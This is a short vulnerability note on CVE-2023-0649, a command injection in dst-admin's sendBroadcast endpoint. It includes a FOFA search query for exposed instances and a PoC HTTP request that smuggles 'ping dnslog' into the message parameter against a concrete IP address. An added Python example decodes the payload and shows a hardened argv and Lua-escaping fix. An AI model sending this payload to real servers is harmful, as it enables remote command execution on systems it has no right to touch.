
dst-admin (饥荒管理后台, the Don't Starve Together management backend): remote command execution via the message parameter of the sendBroadcast endpoint (CVE-2023-0649)

fofa

title=="饥荒管理后台"

poc

GET /home/sendBroadcast?message=%5C%22)%5Cn%22%26ping+dnslog%26screen%20-S%20%22DST_CAVES%22%20-p%200%20-X%20stuff%20%22TheNet%3AKick(%5C%22 HTTP/1.1
Host: 101.34.250.180:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: JSESSIONID=5f9d64b1-ef44-40d1-8266-3ebea0d51e89;rememberMe=deleteMe;
Accept-Encoding: gzip
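The message value above URL-decodes to `\")\n"&ping dnslog&screen -S "DST_CAVES" -p 0 -X stuff "TheNet:Kick(\"`: it closes the quoted argument of the server's screen command, uses `&` to run `ping dnslog` as a separate shell command (dnslog is the page's placeholder for an out-of-band DNS callback host you control), and then opens a second screen command so the quoting stays balanced and the shell accepts the line. The Python below is an added worked example, not code from the page or from the dst-admin project. It decodes the PoC parameter, rebuilds the command line under an assumed server-side template (the `screen -S "DST_MASTER" -p 0 -X stuff "TheNet:Announce(\"...\")\n"` shape and the session name DST_MASTER are hypothetical, inferred from the payload), tokenizes it as a POSIX shell would to show the injected `ping`, and contrasts it with a hardened build that passes screen an argv list and Lua-escapes the message. Nothing here executes screen.

```python
import shlex
from urllib.parse import parse_qs, urlsplit

# Request line from the page's PoC, verbatim ("dnslog" is the page's
# placeholder for an out-of-band DNS callback host).
POC_REQUEST_LINE = (
    "GET /home/sendBroadcast?message=%5C%22)%5Cn%22%26ping+dnslog%26screen"
    "%20-S%20%22DST_CAVES%22%20-p%200%20-X%20stuff%20%22TheNet%3AKick(%5C%22"
    " HTTP/1.1"
)


def message_from_request_line(request_line: str) -> str:
    """URL-decode the `message` query parameter the way a servlet would."""
    target = request_line.split(" ")[1]
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return params["message"][0]


def vulnerable_command(message: str, session: str = "DST_MASTER") -> str:
    """Assumed shape of the server-side command (hypothetical reconstruction
    from the PoC payload, not dst-admin's source): the broadcast text is
    spliced into a `screen -X stuff` line by string concatenation and the
    whole line is handed to a shell."""
    return (
        f'screen -S "{session}" -p 0 -X stuff '
        f'"TheNet:Announce(\\"{message}\\")\\n"'
    )


def shell_programs(command_line: str) -> list:
    """Tokenize a command line as a POSIX shell would and return the program
    name of every command the shell would start. A sound broadcast command
    yields exactly one program."""
    lex = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    lex.commenters = ""
    programs, at_command_start = [], True
    for token in lex:
        if token in ("&", ";", "|", "&&", "||"):
            at_command_start = True  # next token names a new command
        elif at_command_start:
            programs.append(token)
            at_command_start = False
    return programs


def lua_string_literal(text: str) -> str:
    """Render text as a Lua double-quoted string literal so it cannot close
    the TheNet:Announce("...") argument and run arbitrary console Lua."""
    escapes = {"\\": "\\\\", '"': '\\"', "\n": "\\n", "\r": "\\r"}
    out = []
    for ch in text:
        if ch in escapes:
            out.append(escapes[ch])
        elif ord(ch) < 0x20:
            continue  # drop remaining control characters
        else:
            out.append(ch)
    return '"' + "".join(out) + '"'


def hardened_argv(message: str, session: str = "DST_MASTER") -> list:
    """Fixed version: build an argv list for subprocess.run(argv) with no
    shell, so the message is one argument whatever it contains, and
    Lua-escape it so it stays one string inside the console command."""
    lua = f"TheNet:Announce({lua_string_literal(message)})\n"
    return ["screen", "-S", session, "-p", "0", "-X", "stuff", lua]


def hardened_command_line(message: str, session: str = "DST_MASTER") -> str:
    """Only if a shell is unavoidable: quote every argv element."""
    return shlex.join(hardened_argv(message, session))


if __name__ == "__main__":
    msg = message_from_request_line(POC_REQUEST_LINE)
    print("decoded message :", msg)
    print("vulnerable runs  :", shell_programs(vulnerable_command(msg)))
    print("hardened runs    :", shell_programs(hardened_command_line(msg)))
```

Running the block prints `['screen', 'ping', 'screen']` for the assumed vulnerable concatenation and `['screen']` for the hardened form. Passing an argv list only removes the shell from the picture; the message still lands inside a Lua console command, which is why hardened_argv also escapes it as a Lua string literal.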